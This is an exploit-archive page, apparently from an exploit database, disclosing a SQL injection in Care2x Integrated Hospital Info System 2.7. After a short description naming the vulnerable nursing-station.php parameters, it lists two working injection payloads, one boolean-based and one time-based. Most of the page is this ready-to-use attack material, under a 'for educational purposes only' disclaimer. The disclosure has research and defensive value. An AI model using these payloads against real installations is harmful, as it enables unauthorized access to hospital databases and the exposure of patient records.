Care2x integrated hospital info system 2.7 multiple sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-07-29 |
Type : webapps |
Platform : php
This exploit / vulnerability Care2x integrated hospital info system 2.7 multiple sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
# Date: 29.07.2021
# Exploit Author: securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
DESCRIPTION
In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.
The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".
Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg
Care2x integrated hospital info system 2.7 multiple sql injection